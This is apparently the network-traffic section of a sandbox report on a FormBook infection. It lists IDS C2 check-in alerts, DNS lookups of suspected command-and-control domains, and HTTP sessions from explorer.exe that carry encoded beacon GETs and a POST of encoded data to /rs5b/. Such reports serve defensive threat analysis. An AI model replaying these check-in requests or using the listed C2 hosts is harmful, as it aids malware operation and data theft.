                                                                              192.168.2.5199.59.243.22349702802031449 03/20/23-16:50:05.917395TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970280192.168.2.5199.59.243.223
                                                                              192.168.2.5154.218.155.849704802031449 03/20/23-16:50:21.020230TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970480192.168.2.5154.218.155.8
                                                                              192.168.2.5199.59.243.22349702802031412 03/20/23-16:50:05.917395TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970280192.168.2.5199.59.243.223

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Mar 20, 2023 16:49:36.752985954 CET4969580192.168.2.5185.27.134.217
                                                                              Mar 20, 2023 16:49:36.798513889 CET8049695185.27.134.217192.168.2.5
                                                                              Mar 20, 2023 16:49:36.798667908 CET4969580192.168.2.5185.27.134.217
                                                                              Mar 20, 2023 16:49:36.798851013 CET4969580192.168.2.5185.27.134.217
                                                                              Mar 20, 2023 16:49:36.846467018 CET8049695185.27.134.217192.168.2.5
                                                                              Mar 20, 2023 16:49:36.846508026 CET8049695185.27.134.217192.168.2.5
                                                                              Mar 20, 2023 16:49:36.846534014 CET8049695185.27.134.217192.168.2.5
                                                                              Mar 20, 2023 16:49:36.846668005 CET4969580192.168.2.5185.27.134.217
                                                                              Mar 20, 2023 16:49:36.846815109 CET4969580192.168.2.5185.27.134.217
                                                                              Mar 20, 2023 16:49:36.893564939 CET8049695185.27.134.217192.168.2.5
                                                                              Mar 20, 2023 16:49:47.305160046 CET4969780192.168.2.566.96.161.158
                                                                              Mar 20, 2023 16:49:47.408058882 CET804969766.96.161.158192.168.2.5
                                                                              Mar 20, 2023 16:49:47.409275055 CET4969780192.168.2.566.96.161.158
                                                                              Mar 20, 2023 16:49:47.409413099 CET4969780192.168.2.566.96.161.158
                                                                              Mar 20, 2023 16:49:47.507940054 CET804969766.96.161.158192.168.2.5
                                                                              Mar 20, 2023 16:49:47.522320986 CET804969766.96.161.158192.168.2.5
                                                                              Mar 20, 2023 16:49:47.522334099 CET804969766.96.161.158192.168.2.5
                                                                              Mar 20, 2023 16:49:47.522448063 CET4969780192.168.2.566.96.161.158
                                                                              Mar 20, 2023 16:49:48.911513090 CET4969780192.168.2.566.96.161.158
                                                                              Mar 20, 2023 16:49:49.943849087 CET4969880192.168.2.566.96.161.158
                                                                              Mar 20, 2023 16:49:50.047447920 CET804969866.96.161.158192.168.2.5
                                                                              Mar 20, 2023 16:49:50.047601938 CET4969880192.168.2.566.96.161.158
                                                                              Mar 20, 2023 16:49:50.047743082 CET4969880192.168.2.566.96.161.158
                                                                              Mar 20, 2023 16:49:50.153841019 CET804969866.96.161.158192.168.2.5
                                                                              Mar 20, 2023 16:49:50.166798115 CET804969866.96.161.158192.168.2.5
                                                                              Mar 20, 2023 16:49:50.166841030 CET804969866.96.161.158192.168.2.5
                                                                              Mar 20, 2023 16:49:50.167016029 CET4969880192.168.2.566.96.161.158
                                                                              Mar 20, 2023 16:49:50.167174101 CET4969880192.168.2.566.96.161.158
                                                                              Mar 20, 2023 16:49:50.270334959 CET804969866.96.161.158192.168.2.5
                                                                              Mar 20, 2023 16:49:55.218449116 CET4969980192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:55.362806082 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.363044977 CET4969980192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:55.363253117 CET4969980192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:55.507684946 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.599078894 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.599138021 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.599172115 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.599205971 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.599205971 CET4969980192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:55.599307060 CET4969980192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:55.616341114 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.616391897 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.616436005 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.616446018 CET4969980192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:55.636303902 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.636338949 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.636357069 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.636382103 CET4969980192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:55.636410952 CET4969980192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:55.638071060 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.638227940 CET4969980192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:56.865391970 CET4969980192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:57.958993912 CET4970080192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:58.106313944 CET8049700206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:58.106503010 CET4970080192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:58.125310898 CET4970080192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:58.271821976 CET8049700206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:58.301676989 CET8049700206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:58.301717043 CET8049700206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:58.301903009 CET4970080192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:58.302017927 CET4970080192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:58.448338985 CET8049700206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:50:03.352196932 CET4970180192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:03.371409893 CET8049701199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:03.371604919 CET4970180192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:03.374115944 CET4970180192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:03.393213987 CET8049701199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:03.574099064 CET8049701199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:03.574167013 CET8049701199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:03.574197054 CET8049701199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:03.574322939 CET4970180192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:03.589508057 CET8049701199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:03.589802980 CET4970180192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:04.881839991 CET4970180192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:05.897761106 CET4970280192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:05.916883945 CET8049702199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:05.917094946 CET4970280192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:05.917395115 CET4970280192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:05.936451912 CET8049702199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:06.120157957 CET8049702199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:06.120187044 CET8049702199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:06.120206118 CET8049702199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:06.120223999 CET8049702199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:06.120419025 CET4970280192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:06.120467901 CET4970280192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:06.120614052 CET4970280192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:06.132888079 CET8049702199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:06.134841919 CET4970280192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:06.141745090 CET8049702199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:17.256160021 CET4970380192.168.2.5154.218.155.8
                                                                              Mar 20, 2023 16:50:17.533209085 CET8049703154.218.155.8192.168.2.5
                                                                              Mar 20, 2023 16:50:17.533366919 CET4970380192.168.2.5154.218.155.8
                                                                              Mar 20, 2023 16:50:17.533485889 CET4970380192.168.2.5154.218.155.8
                                                                              Mar 20, 2023 16:50:17.810214996 CET8049703154.218.155.8192.168.2.5
                                                                              Mar 20, 2023 16:50:17.879627943 CET8049703154.218.155.8192.168.2.5
                                                                              Mar 20, 2023 16:50:17.879694939 CET8049703154.218.155.8192.168.2.5
                                                                              Mar 20, 2023 16:50:17.879858017 CET4970380192.168.2.5154.218.155.8
                                                                              Mar 20, 2023 16:50:19.728488922 CET4970380192.168.2.5154.218.155.8
                                                                              Mar 20, 2023 16:50:20.743052006 CET4970480192.168.2.5154.218.155.8
                                                                              Mar 20, 2023 16:50:21.019658089 CET8049704154.218.155.8192.168.2.5
                                                                              Mar 20, 2023 16:50:21.019933939 CET4970480192.168.2.5154.218.155.8
                                                                              Mar 20, 2023 16:50:21.020230055 CET4970480192.168.2.5154.218.155.8
                                                                              Mar 20, 2023 16:50:21.296535969 CET8049704154.218.155.8192.168.2.5
                                                                              Mar 20, 2023 16:50:21.300268888 CET8049704154.218.155.8192.168.2.5
                                                                              Mar 20, 2023 16:50:21.300308943 CET8049704154.218.155.8192.168.2.5
                                                                              Mar 20, 2023 16:50:21.300450087 CET4970480192.168.2.5154.218.155.8
                                                                              Mar 20, 2023 16:50:21.300616980 CET4970480192.168.2.5154.218.155.8
                                                                              Mar 20, 2023 16:50:21.576916933 CET8049704154.218.155.8192.168.2.5
                                                                              Mar 20, 2023 16:50:26.364415884 CET4970580192.168.2.5198.177.124.57
                                                                              Mar 20, 2023 16:50:26.540719986 CET8049705198.177.124.57192.168.2.5
                                                                              Mar 20, 2023 16:50:26.540930986 CET4970580192.168.2.5198.177.124.57
                                                                              Mar 20, 2023 16:50:26.541023970 CET4970580192.168.2.5198.177.124.57
                                                                              Mar 20, 2023 16:50:26.716747999 CET8049705198.177.124.57192.168.2.5
                                                                              Mar 20, 2023 16:50:26.815551043 CET8049705198.177.124.57192.168.2.5
                                                                              Mar 20, 2023 16:50:26.815606117 CET8049705198.177.124.57192.168.2.5
                                                                              Mar 20, 2023 16:50:26.815810919 CET4970580192.168.2.5198.177.124.57
                                                                              Mar 20, 2023 16:50:28.056752920 CET4970580192.168.2.5198.177.124.57
                                                                              Mar 20, 2023 16:50:29.072011948 CET4970680192.168.2.5198.177.124.57
                                                                              Mar 20, 2023 16:50:29.247039080 CET8049706198.177.124.57192.168.2.5
                                                                              Mar 20, 2023 16:50:29.247306108 CET4970680192.168.2.5198.177.124.57
                                                                              Mar 20, 2023 16:50:29.247456074 CET4970680192.168.2.5198.177.124.57
                                                                              Mar 20, 2023 16:50:29.422075033 CET8049706198.177.124.57192.168.2.5
                                                                              Mar 20, 2023 16:50:29.518753052 CET8049706198.177.124.57192.168.2.5
                                                                              Mar 20, 2023 16:50:29.518846035 CET8049706198.177.124.57192.168.2.5
                                                                              Mar 20, 2023 16:50:29.519155025 CET4970680192.168.2.5198.177.124.57
                                                                              Mar 20, 2023 16:50:29.519424915 CET4970680192.168.2.5198.177.124.57
                                                                              Mar 20, 2023 16:50:29.694087982 CET8049706198.177.124.57192.168.2.5
                                                                              Mar 20, 2023 16:50:34.564620018 CET4970780192.168.2.545.114.105.2
                                                                              Mar 20, 2023 16:50:34.816682100 CET804970745.114.105.2192.168.2.5
                                                                              Mar 20, 2023 16:50:34.817733049 CET4970780192.168.2.545.114.105.2
                                                                              Mar 20, 2023 16:50:34.817869902 CET4970780192.168.2.545.114.105.2
                                                                              Mar 20, 2023 16:50:35.070087910 CET804970745.114.105.2192.168.2.5
                                                                              Mar 20, 2023 16:50:35.249516010 CET804970745.114.105.2192.168.2.5
                                                                              Mar 20, 2023 16:50:35.249576092 CET804970745.114.105.2192.168.2.5
                                                                              Mar 20, 2023 16:50:35.249876976 CET4970780192.168.2.545.114.105.2
                                                                              Mar 20, 2023 16:50:36.341392040 CET4970780192.168.2.545.114.105.2
                                                                              Mar 20, 2023 16:50:38.288278103 CET4970880192.168.2.545.114.105.2
                                                                              Mar 20, 2023 16:50:38.536365032 CET804970845.114.105.2192.168.2.5
                                                                              Mar 20, 2023 16:50:38.537643909 CET4970880192.168.2.545.114.105.2
                                                                              Mar 20, 2023 16:50:38.678186893 CET4970880192.168.2.545.114.105.2
                                                                              Mar 20, 2023 16:50:38.926736116 CET804970845.114.105.2192.168.2.5
                                                                              Mar 20, 2023 16:50:38.929861069 CET804970845.114.105.2192.168.2.5
                                                                              Mar 20, 2023 16:50:38.929925919 CET804970845.114.105.2192.168.2.5
                                                                              Mar 20, 2023 16:50:38.930274010 CET4970880192.168.2.545.114.105.2
                                                                              Mar 20, 2023 16:50:39.283489943 CET4970880192.168.2.545.114.105.2
                                                                              Mar 20, 2023 16:50:39.531642914 CET804970845.114.105.2192.168.2.5

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Mar 20, 2023 16:49:31.670409918 CET5864853192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:49:31.692192078 CET53586488.8.8.8192.168.2.5
                                                                              Mar 20, 2023 16:49:36.711066961 CET5689453192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:49:36.748585939 CET53568948.8.8.8192.168.2.5
                                                                              Mar 20, 2023 16:49:47.181622028 CET6084153192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:49:47.295319080 CET53608418.8.8.8192.168.2.5
                                                                              Mar 20, 2023 16:49:55.184149027 CET6189353192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:49:55.216954947 CET53618938.8.8.8192.168.2.5
                                                                              Mar 20, 2023 16:50:03.326172113 CET6064953192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:50:03.350786924 CET53606498.8.8.8192.168.2.5
                                                                              Mar 20, 2023 16:50:11.142652035 CET5144153192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:50:11.171879053 CET53514418.8.8.8192.168.2.5
                                                                              Mar 20, 2023 16:50:12.181365967 CET4917753192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:50:12.202626944 CET53491778.8.8.8192.168.2.5
                                                                              Mar 20, 2023 16:50:17.231201887 CET4972453192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:50:17.255079031 CET53497248.8.8.8192.168.2.5
                                                                              Mar 20, 2023 16:50:26.343081951 CET6145253192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:50:26.362843990 CET53614528.8.8.8192.168.2.5
                                                                              Mar 20, 2023 16:50:34.530338049 CET6532353192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:50:34.561840057 CET53653238.8.8.8192.168.2.5
                                                                              Mar 20, 2023 16:50:51.235682964 CET5148453192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:50:51.260627031 CET53514848.8.8.8192.168.2.5
                                                                              Mar 20, 2023 16:50:58.838778973 CET6344653192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:50:58.860341072 CET53634468.8.8.8192.168.2.5

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Mar 20, 2023 16:49:31.670409918 CET192.168.2.58.8.8.80xa49Standard query (0)www.emagrecarapido.storeA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:49:36.711066961 CET192.168.2.58.8.8.80xb396Standard query (0)www.isabellagambitta.comA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:49:47.181622028 CET192.168.2.58.8.8.80x30a5Standard query (0)www.drkathleensanders.comA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:49:55.184149027 CET192.168.2.58.8.8.80x94e6Standard query (0)www.carcosainvest.comA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:03.326172113 CET192.168.2.58.8.8.80x35e6Standard query (0)www.piergitarshoes.comA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:11.142652035 CET192.168.2.58.8.8.80x86abStandard query (0)www.tcatelier.comA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:12.181365967 CET192.168.2.58.8.8.80xddc4Standard query (0)www.tcatelier.comA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:17.231201887 CET192.168.2.58.8.8.80xccf9Standard query (0)www.ywtxsm.comA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:26.343081951 CET192.168.2.58.8.8.80x51a6Standard query (0)www.peramid.xyzA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:34.530338049 CET192.168.2.58.8.8.80xcf32Standard query (0)www.locationsbormes.comA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:51.235682964 CET192.168.2.58.8.8.80xdeecStandard query (0)www.amirah.cfdA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:58.838778973 CET192.168.2.58.8.8.80x1301Standard query (0)www.amirah.cfdA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Mar 20, 2023 16:49:31.692192078 CET8.8.8.8192.168.2.50xa49Name error (3)www.emagrecarapido.storenonenoneA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:49:36.748585939 CET8.8.8.8192.168.2.50xb396No error (0)www.isabellagambitta.com185.27.134.217A (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:49:47.295319080 CET8.8.8.8192.168.2.50x30a5No error (0)www.drkathleensanders.com66.96.161.158A (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:49:55.216954947 CET8.8.8.8192.168.2.50x94e6No error (0)www.carcosainvest.comcarcosainvest.comCNAME (Canonical name)IN (0x0001)false
                                                                              Mar 20, 2023 16:49:55.216954947 CET8.8.8.8192.168.2.50x94e6No error (0)carcosainvest.com206.54.190.30A (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:03.350786924 CET8.8.8.8192.168.2.50x35e6No error (0)www.piergitarshoes.com199.59.243.223A (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:11.171879053 CET8.8.8.8192.168.2.50x86abName error (3)www.tcatelier.comnonenoneA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:12.202626944 CET8.8.8.8192.168.2.50xddc4Name error (3)www.tcatelier.comnonenoneA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:17.255079031 CET8.8.8.8192.168.2.50xccf9No error (0)www.ywtxsm.com154.218.155.8A (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:26.362843990 CET8.8.8.8192.168.2.50x51a6No error (0)www.peramid.xyz198.177.124.57A (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:34.561840057 CET8.8.8.8192.168.2.50xcf32No error (0)www.locationsbormes.com45.114.105.2A (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:51.260627031 CET8.8.8.8192.168.2.50xdeecName error (3)www.amirah.cfdnonenoneA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:58.860341072 CET8.8.8.8192.168.2.50x1301Name error (3)www.amirah.cfdnonenoneA (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • www.isabellagambitta.com
                                                                              • www.drkathleensanders.com
                                                                              • www.carcosainvest.com
                                                                              • www.piergitarshoes.com
                                                                              • www.ywtxsm.com
                                                                              • www.peramid.xyz
                                                                              • www.locationsbormes.com

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              0192.168.2.549695185.27.134.21780C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 20, 2023 16:49:36.798851013 CET94OUTGET /rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhA HTTP/1.1
                                                                              Host: www.isabellagambitta.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 20, 2023 16:49:36.846508026 CET95INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Mon, 20 Mar 2023 15:49:36 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 965
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 3b 72 65 74 75 72 6e 20 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 76 61 72 20 61 3d 74 6f 4e 75 6d 62 65 72 73 28 22 66 36 35 35 62 61 39 64 30 39 61 31 31 32 64 34 39 36 38 63 36 33 35 37 39 64 62 35 39 30 62 34 22 29 2c 62 3d 74 6f 4e 75 6d 62 65 72 73 28 22 39 38 33 34 34 63 32 65 65 65 38 36 63 33 39 39 34 38 39 30 35 39 32 35 38 35 62 34 39 66 38 30 22 29 2c 63 3d 74 6f 4e 75 6d 62 65 72 73 28 22 65 65 35 63 61 37 32 65 66 35 65 34 61 65 33 62 66 66 64 30 66 31 61 61 65 66 61 39 66 62 33 64 22 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 22 5f 5f 74 65 73 74 3d 22 2b 74 6f 48 65 78 28 73 6c 6f 77 41 45 53 2e 64 65 63 72 79 70 74 28 63 2c 32 2c 61 2c 62 29 29 2b 22 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 33 31 2d 44 65 63 2d 33 37 20 32 33 3a 35 35 3a 35 35 20 47 4d 54 3b 20 70 61 74 68 3d 2f 22 3b 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 73 61 62 65 6c 6c 61 67 61 6d 62 69 74 74 61 2e 63 6f 6d 2f 72 73 35 62 2f 3f 75 79 78 76 67 3d 43 73 58 43 30 62 55 36 59 67 62 4b 34 76 2f 69 6b 55 2b 46 52 33 5a 44 63 54 79 6e 70 42 36 67 5a 4e 63 75 78 6e 4c 6d 48 75 38 44 72 75 70 64 4c 79 32 52 76 78 32 72 70 35 6b 61 30 34 66 35 56 6c 77 45 69 67 73 54 63 44 6e 6f 79 52 62 2f 68 74 34 75 59 43 49 45 6f 51 7a 63 5a 7a 66 4d 6e 77 3d 3d 26 4c 36 48 52 65 3d 48 69 6e 6b 6d 73 4c 44 6a 68 41 26 69 3d 31 22 3b 3c 2f 73 63 72 69 70 74 3e 3c 6e 6f 73 63 72 69 70 74 3e 54 68 69 73 20 73 69 74 65 20 72 65 71 75 69 72 65 73 20 4a 61 76 61 73 63 72 69 70 74 20 74 6f 20 77 6f 72 6b 2c 20 70 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 4a 61 76 61 73 63 72 69 70 74 20 69 6e 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 6f 72 20 75 73 65 20 61 20 62 72 6f 77 73 65 72 20 77 69 74 68 20 4a 61 76 61 73 63 72 69 70 74 20 73 75 70 70 6f 72 74 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                              Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("ee5ca72ef5e4ae3bffd0f1aaefa9fb3d");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhA&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              1192.168.2.54969766.96.161.15880C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 20, 2023 16:49:47.409413099 CET109OUTPOST /rs5b/ HTTP/1.1
                                                                              Host: www.drkathleensanders.com
                                                                              Connection: close
                                                                              Content-Length: 187
                                                                              Cache-Control: no-cache
                                                                              Origin: http://www.drkathleensanders.com
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://www.drkathleensanders.com/rs5b/
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate
                                                                              Data Raw: 75 79 78 76 67 3d 66 70 66 67 7a 34 4e 43 73 48 6c 68 7e 65 63 75 77 4a 74 64 64 68 50 6d 32 62 50 51 50 62 52 4e 42 73 7a 41 68 44 35 47 76 50 34 5a 63 75 37 6a 6c 62 46 37 55 38 67 6e 62 44 30 6d 42 5a 7e 41 4c 65 63 52 79 43 58 65 4e 74 34 6b 6c 39 6c 77 55 4b 37 41 75 56 35 58 66 6b 77 51 65 75 30 61 43 7a 69 65 73 53 47 4e 66 68 7a 34 6e 43 61 56 4e 30 43 6d 75 63 39 56 7e 32 6e 4d 37 4b 4b 44 7e 65 79 67 6e 73 6d 4d 77 58 68 77 47 4b 68 65 33 4b 47 72 52 78 49 43 5a 49 7e 6b 4d 72 43 4d 6c 43 73 7a 32 37 59 43 28 74 58 35 49 44 65 38 43 41 29 2e 00 00 00 00 00 00 00 00
                                                                              Data Ascii: uyxvg=fpfgz4NCsHlh~ecuwJtddhPm2bPQPbRNBszAhD5GvP4Zcu7jlbF7U8gnbD0mBZ~ALecRyCXeNt4kl9lwUK7AuV5XfkwQeu0aCziesSGNfhz4nCaVN0Cmuc9V~2nM7KKD~eygnsmMwXhwGKhe3KGrRxICZI~kMrCMlCsz27YC(tX5IDe8CA).
                                                                              Mar 20, 2023 16:49:47.522320986 CET111INHTTP/1.1 404 Not Found
                                                                              Date: Mon, 20 Mar 2023 15:49:47 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 867
                                                                              Connection: close
                                                                              Server: Apache/2
                                                                              Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                              Accept-Ranges: bytes
                                                                              Age: 0
